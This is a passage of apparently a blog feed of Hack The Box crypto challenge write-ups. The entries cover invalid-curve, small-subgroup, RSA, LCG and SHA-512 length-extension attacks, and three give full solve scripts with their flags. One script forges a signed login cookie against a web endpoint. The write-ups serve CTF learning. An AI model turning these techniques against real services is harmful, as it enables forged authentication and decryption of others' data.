challenge exposes scalar multiplication on attacker-controlled points with curve params fixed only as:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>a = 0, p = secp256k1 prime </span></span></code></pre></div><p>but it does <strong>not</strong> verify that user points belong to the intended curve subgroup.</p> <p>That enables an <strong>invalid-curve / small-subgroup attack</strong>:</p> <ul> <li>send crafted points with known small order <code>q</code></li> <li>observe <code>k*P</code> from the server</li> <li>recover <code>k mod q</code> by brute-force discrete log in tiny subgroup</li> <li>combine residues with CRT to recover the bounded private key (<code>k &lt; 8748541127929402731638</code>)</li> </ul> <p>Then option 2 seeds Python RNG with that <code>k</code>, so basis choices become predictable and AES key is recoverable.</p> /posts/htb-crypto-shamirs-secret/ Fri, 27 Feb 2026 11:35:00 +0700 /posts/htb-crypto-shamirs-secret/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Shamir&rsquo;s Secret</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the hidden flag from a custom share-encryption service.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service returns 64 pairs <code>(x, y)</code> where only 32 are genuine polynomial evaluations and 32 are random noise.</p> <p>For a message <code>m</code>, real pairs satisfy:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>y = f(x) mod 2^1024 </span></span><span style="display:flex;"><span>f(t) = m + a1*t + a2*t^2 + ... + a31*t^31 </span></span></code></pre></div><p>The same hidden 64-bit mask decides which indices are real/fake for the whole process.</p> /posts/htb-crypto-quick-maffs/ Fri, 27 Feb 2026 09:58:00 +0700 /posts/htb-crypto-quick-maffs/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> quick maffs</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Hard</li> <li><strong>Goal:</strong> Recover the plaintext triplet and reconstruct the flag.</li> </ul> <h2 id="root-cause">Root Cause</h2> <p>The service encrypts three related plaintext chunks under the same RSA modulus/exponent pair:</p> <ul> <li><code>c1 = m1^e mod N</code></li> <li><code>c2 = m2^e mod N</code></li> <li><code>c3 = m3^e mod N</code></li> <li>and leaks <code>m1 + m2 + m3 = hint</code></li> </ul> <p>Because <code>e</code> is a prime <code>&lt; 1024</code>, we can iterate candidate exponents and solve the algebraic system directly.</p> /posts/htb-crypto-yalm/ Fri, 27 Feb 2026 02:26:00 +0700 /posts/htb-crypto-yalm/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> YALM</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover encrypted secret despite hidden RSA modulus.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Server encrypts with RSA (<code>e=3</code>) but does not reveal <code>n</code>.</p> <p>However, test endpoint leaks comparison against <code>n</code>:</p> <ul> <li>if plaintext <code>&lt; n</code> → accepted</li> <li>if plaintext <code>&gt;= n</code> → <code>Too many messages!</code></li> </ul> <p>So we can recover exact <code>n</code> by binary searching this boundary.</p> <p>Then ciphertext equation is:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>c = (prefix || flag)^3 mod n </span></span></code></pre></div><p>With known prefix and small unknown suffix (flag), this becomes a univariate small-root problem solved by Coppersmith.</p> /posts/htb-crypto-birds-of-randomness/ Fri, 27 Feb 2026 02:24:00 +0700 /posts/htb-crypto-birds-of-randomness/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Birds of randomness</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Predict destination coordinates within 6 guesses and retrieve the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Station coordinates are generated as <code>d*G</code> on a fixed ECC curve, where <code>d = x*y*z</code> from a weak PRNG state triplet with tiny moduli (<code>~30k</code>).</p> <p>That puts <code>d</code> in a bounded range:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>d &lt; 30269 * 30307 * 30323 ≈ 2.78e13 </span></span></code></pre></div><p>A bounded discrete log is feasible with BSGS.</p> /posts/htb-crypto-rhome/ Fri, 27 Feb 2026 02:22:00 +0700 /posts/htb-crypto-rhome/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Rhome</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Recover shared secret and decrypt AES-encrypted flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The challenge builds prime <code>p = 2*q*r + 1</code>, then sets generator:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>g = h^(2r) mod p </span></span></code></pre></div><p>This forces <code>g</code> into the subgroup of order <code>q</code> (small, ~42-bit). So both public keys <code>A = g^a</code>, <code>B = g^b</code> leak exponents modulo small <code>q</code>, making discrete log feasible.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Query <code>(p,g,A,B)</code> and ciphertext.</li> <li>Factor <code>p-1</code>, identify small prime subgroup order <code>q</code>.</li> <li>Solve <code>a = dlog_g(A)</code> and <code>b = dlog_g(B)</code> modulo <code>q</code>.</li> <li>Recompute shared secret <code>ss = g^(ab mod q)</code>.</li> <li>Derive AES key from <code>sha256(ss)[:16]</code> and decrypt.</li> </ol> <h2 id="solve-script-full-poc">Solve Script (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> re </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> hashlib <span style="color:#f92672">import</span> sha256 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> remote </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> sympy <span style="color:#f92672">import</span> factorint </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> sympy.ntheory <span style="color:#f92672">import</span> discrete_log </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> Crypto.Cipher <span style="color:#f92672">import</span> AES </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> Crypto.Util.Padding <span style="color:#f92672">import</span> unpad </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> Crypto.Util.number <span style="color:#f92672">import</span> long_to_bytes </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">recv_menu</span>(io): </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&gt; &#39;</span>)<span style="color:#f92672">.</span>decode(errors<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;ignore&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">parse_params</span>(blob): </span></span><span style="display:flex;"><span> p <span style="color:#f92672">=</span> int(re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;p = (\d+)&#39;</span>, blob)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)) </span></span><span style="display:flex;"><span> g <span style="color:#f92672">=</span> int(re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;g = (\d+)&#39;</span>, blob)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)) </span></span><span style="display:flex;"><span> A <span style="color:#f92672">=</span> int(re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;A = (\d+)&#39;</span>, blob)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)) </span></span><span style="display:flex;"><span> B <span style="color:#f92672">=</span> int(re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;B = (\d+)&#39;</span>, blob)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> p, g, A, B </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>(): </span></span><span style="display:flex;"><span> ap <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser() </span></span><span style="display:flex;"><span> ap<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#39;--host&#39;</span>, required<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>) </span></span><span style="display:flex;"><span> ap<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#39;--port&#39;</span>, required<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, type<span style="color:#f92672">=</span>int) </span></span><span style="display:flex;"><span> args <span style="color:#f92672">=</span> ap<span style="color:#f92672">.</span>parse_args() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> io <span style="color:#f92672">=</span> remote(args<span style="color:#f92672">.</span>host, args<span style="color:#f92672">.</span>port) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> recv_menu(io) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>) </span></span><span style="display:flex;"><span> p, g, A, B <span style="color:#f92672">=</span> parse_params(recv_menu(io)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;3&#39;</span>) </span></span><span style="display:flex;"><span> ct_blob <span style="color:#f92672">=</span> recv_menu(io) </span></span><span style="display:flex;"><span> ct <span style="color:#f92672">=</span> bytes<span style="color:#f92672">.</span>fromhex(re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;encrypted = ([0-9a-f]+)&#39;</span>, ct_blob)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)) </span></span><span style="display:flex;"><span> io<span style="color:#f92672">.</span>close() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> fac <span style="color:#f92672">=</span> factorint(p <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> q_small <span style="color:#f92672">=</span> <span style="color:#66d9ef">None</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> f <span style="color:#f92672">in</span> fac: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> <span style="color:#ae81ff">35</span> <span style="color:#f92672">&lt;=</span> int(f)<span style="color:#f92672">.</span>bit_length() <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">43</span>: </span></span><span style="display:flex;"><span> q_small <span style="color:#f92672">=</span> int(f) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">break</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> q_small <span style="color:#f92672">is</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">SystemExit</span>(<span style="color:#e6db74">&#39;small subgroup order not found&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> a <span style="color:#f92672">=</span> discrete_log(p, A, g, order<span style="color:#f92672">=</span>q_small) </span></span><span style="display:flex;"><span> b <span style="color:#f92672">=</span> discrete_log(p, B, g, order<span style="color:#f92672">=</span>q_small) </span></span><span style="display:flex;"><span> ss <span style="color:#f92672">=</span> pow(g, (a <span style="color:#f92672">*</span> b) <span style="color:#f92672">%</span> q_small, p) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> key <span style="color:#f92672">=</span> sha256(long_to_bytes(ss))<span style="color:#f92672">.</span>digest()[:<span style="color:#ae81ff">16</span>] </span></span><span style="display:flex;"><span> pt <span style="color:#f92672">=</span> unpad(AES<span style="color:#f92672">.</span>new(key, AES<span style="color:#f92672">.</span>MODE_ECB)<span style="color:#f92672">.</span>decrypt(ct), <span style="color:#ae81ff">16</span>) </span></span><span style="display:flex;"><span> print(pt<span style="color:#f92672">.</span>decode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;__main__&#39;</span>: </span></span><span style="display:flex;"><span> main() </span></span></code></pre></div><h2 id="run">Run</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 solve.py --host &lt;ip&gt; --port &lt;port&gt; </span></span></code></pre></div><h2 id="result">Result</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{00ps_wh4t_4_sm411_0rd3r} </span></span></code></pre></div></pagevault> /posts/htb-crypto-embryonic-plant/ Fri, 27 Feb 2026 02:20:00 +0700 /posts/htb-crypto-embryonic-plant/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Embryonic Plant</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Recover AES key and decrypt encrypted flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Service prints:</p> <ul> <li><code>n = p*q*r</code></li> <li>five consecutive RNG states from:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>s_{i+1} = (s_i * p + q) mod r </span></span></code></pre></div><p>Same <code>p,q,r</code> are RSA factors and used to derive private exponent <code>d</code>; AES key is <code>sha256(d)</code>.</p> <p>Leaking several states lets us recover the LCG modulus/parameters, which also recovers RSA factors.</p> /posts/htb-crypto-quantum-safe/ Fri, 27 Feb 2026 02:18:00 +0700 /posts/htb-crypto-quantum-safe/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Quantum-Safe</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Recover flag from matrix-based encoding output.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The challenge encodes each character with:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>y = [ord(c), a, b] * P + r </span></span></code></pre></div><ul> <li><code>P</code> is public and invertible.</li> <li><code>a,b</code> are small random values in <code>[0,100]</code>.</li> <li><code>r</code> is a fixed unknown offset vector.</li> </ul> <p>Because <code>P</code> is invertible and noise is bounded, we can recover <code>r</code> and decode all rows exactly.</p> /posts/htb-crypto-protein-cookies/ Fri, 27 Feb 2026 02:16:00 +0700 /posts/htb-crypto-protein-cookies/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Protein Cookies</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Access protected <code>/program</code> content and recover flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Cookie signature uses SHA-512 over a construction equivalent to:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sig = SHA512(secret || payload) </span></span></code></pre></div><p>This is vulnerable to length extension. We can append <code>&amp;isLoggedIn=True</code> and forge a valid new signature without knowing <code>secret</code>.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Obtain guest <code>login_info</code> cookie.</li> <li>Parse payload+digest.</li> <li>Perform SHA-512 length-extension with guessed secret length.</li> <li>Send forged cookie to <code>/program</code>.</li> <li>Extract flag from returned PDF/content.</li> </ol> <h2 id="solve-script-full-poc">Solve Script (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> base64 </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> hashpumpy <span style="color:#f92672">import</span> hashpump </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>(): </span></span><span style="display:flex;"><span> ap <span style="color:#f92672">=</span> argparse<span style="color:#f92672">.</span>ArgumentParser() </span></span><span style="display:flex;"><span> ap<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#39;--base&#39;</span>, required<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, help<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;e.g. http://&lt;ip&gt;:&lt;port&gt;&#39;</span>) </span></span><span style="display:flex;"><span> ap<span style="color:#f92672">.</span>add_argument(<span style="color:#e6db74">&#39;--secret-len&#39;</span>, type<span style="color:#f92672">=</span>int, default<span style="color:#f92672">=</span><span style="color:#ae81ff">16</span>) </span></span><span style="display:flex;"><span> args <span style="color:#f92672">=</span> ap<span style="color:#f92672">.</span>parse_args() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> s <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>Session() </span></span><span style="display:flex;"><span> s<span style="color:#f92672">.</span>get(args<span style="color:#f92672">.</span>base <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;/program&#39;</span>, allow_redirects<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>) </span></span><span style="display:flex;"><span> guest <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>cookies<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;login_info&#39;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> guest: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">SystemExit</span>(<span style="color:#e6db74">&#39;missing guest cookie&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> payload_b64, sig_b64 <span style="color:#f92672">=</span> guest<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39;.&#39;</span>, <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> payload <span style="color:#f92672">=</span> base64<span style="color:#f92672">.</span>b64decode(payload_b64) </span></span><span style="display:flex;"><span> sig_hex <span style="color:#f92672">=</span> base64<span style="color:#f92672">.</span>b64decode(sig_b64)<span style="color:#f92672">.</span>decode() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> append <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&amp;isLoggedIn=True&#39;</span> </span></span><span style="display:flex;"><span> new_sig_hex, forged_payload <span style="color:#f92672">=</span> hashpump(sig_hex, payload<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#39;latin1&#39;</span>), append<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#39;latin1&#39;</span>), args<span style="color:#f92672">.</span>secret_len) </span></span><span style="display:flex;"><span> forged_cookie <span style="color:#f92672">=</span> ( </span></span><span style="display:flex;"><span> base64<span style="color:#f92672">.</span>b64encode(forged_payload<span style="color:#f92672">.</span>encode(<span style="color:#e6db74">&#39;latin1&#39;</span>))<span style="color:#f92672">.</span>decode() <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;.&#39;</span> <span style="color:#f92672">+</span> </span></span><span style="display:flex;"><span> base64<span style="color:#f92672">.</span>b64encode(new_sig_hex<span style="color:#f92672">.</span>encode())<span style="color:#f92672">.</span>decode() </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(args<span style="color:#f92672">.</span>base <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;/program&#39;</span>, headers<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#39;Cookie&#39;</span>: <span style="color:#e6db74">f</span><span style="color:#e6db74">&#39;login_info=</span><span style="color:#e6db74">{</span>forged_cookie<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;</span>}, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>) </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#39;status:&#39;</span>, r<span style="color:#f92672">.</span>status_code) </span></span><span style="display:flex;"><span> print(r<span style="color:#f92672">.</span>text[:<span style="color:#ae81ff">400</span>]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;__main__&#39;</span>: </span></span><span style="display:flex;"><span> main() </span></span></code></pre></div><h2 id="run">Run</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 solve.py --base http://&lt;ip&gt;:&lt;port&gt; </span></span></code></pre></div><h2 id="result">Result</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{l1ght_w31ght_b4b3h!} </span></span></code></pre></div></pagevault> /posts/htb-crypto-rsaiseasy/ Fri, 27 Feb 2026 02:14:00 +0700 /posts/htb-crypto-rsaiseasy/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> RSAisEasy</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal:</strong> Recover two RSA-encrypted halves of the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Given values follow:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>n1 = p*q </span></span><span style="display:flex;"><span>n2 = q*z </span></span><span style="display:flex;"><span>leak = n1*E + n2 </span></span></code></pre></div><p>So:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>gcd(n1, leak) = gcd(p*q, n1*E + q*z) = q </span></span></code></pre></div><p>Once <code>q</code> is recovered, both RSA systems collapse.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Compute <code>q = gcd(n1, leak)</code>.</li> <li>Recover <code>p = n1 // q</code> and decrypt <code>c1</code>.</li> <li>Recover <code>n2</code> from <code>leak % n1</code> (check valid branch <code>r</code> or <code>r+n1</code>).</li> <li>Decrypt <code>c2</code> and concatenate both parts.</li> </ol> <h2 id="solve-script-full-poc">Solve Script (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> math <span style="color:#f92672">import</span> gcd </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> Crypto.Util.number <span style="color:#f92672">import</span> long_to_bytes </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># paste challenge constants</span> </span></span><span style="display:flex;"><span>n1 <span style="color:#f92672">=</span> <span style="color:#f92672">...</span> </span></span><span style="display:flex;"><span>c1 <span style="color:#f92672">=</span> <span style="color:#f92672">...</span> </span></span><span style="display:flex;"><span>c2 <span style="color:#f92672">=</span> <span style="color:#f92672">...</span> </span></span><span style="display:flex;"><span>leak <span style="color:#f92672">=</span> <span style="color:#f92672">...</span> </span></span><span style="display:flex;"><span>e <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x10001</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>q <span style="color:#f92672">=</span> gcd(n1, leak) </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> n1 <span style="color:#f92672">//</span> q </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>phi1 <span style="color:#f92672">=</span> (p <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">*</span> (q <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>d1 <span style="color:#f92672">=</span> pow(e, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, phi1) </span></span><span style="display:flex;"><span>part1 <span style="color:#f92672">=</span> long_to_bytes(pow(c1, d1, n1)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>r <span style="color:#f92672">=</span> leak <span style="color:#f92672">%</span> n1 </span></span><span style="display:flex;"><span>part2_candidates <span style="color:#f92672">=</span> [] </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> k <span style="color:#f92672">in</span> (<span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">1</span>): </span></span><span style="display:flex;"><span> n2 <span style="color:#f92672">=</span> r <span style="color:#f92672">+</span> k <span style="color:#f92672">*</span> n1 </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> n2 <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">or</span> n2 <span style="color:#f92672">%</span> q <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span> </span></span><span style="display:flex;"><span> z <span style="color:#f92672">=</span> n2 <span style="color:#f92672">//</span> q </span></span><span style="display:flex;"><span> phi2 <span style="color:#f92672">=</span> (q <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) <span style="color:#f92672">*</span> (z <span style="color:#f92672">-</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> d2 <span style="color:#f92672">=</span> pow(e, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, phi2) </span></span><span style="display:flex;"><span> m2 <span style="color:#f92672">=</span> long_to_bytes(pow(c2, d2, n2)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> all(<span style="color:#ae81ff">32</span> <span style="color:#f92672">&lt;=</span> b <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">127</span> <span style="color:#66d9ef">for</span> b <span style="color:#f92672">in</span> m2): </span></span><span style="display:flex;"><span> part2_candidates<span style="color:#f92672">.</span>append(m2) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> part2_candidates: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">SystemExit</span>(<span style="color:#e6db74">&#39;no valid second part&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>flag <span style="color:#f92672">=</span> (part1 <span style="color:#f92672">+</span> part2_candidates[<span style="color:#ae81ff">0</span>])<span style="color:#f92672">.</span>decode() </span></span><span style="display:flex;"><span>print(flag) </span></span></code></pre></div><h2 id="run">Run</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>python3 solve.py </span></span></code></pre></div><h2 id="result">Result</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span 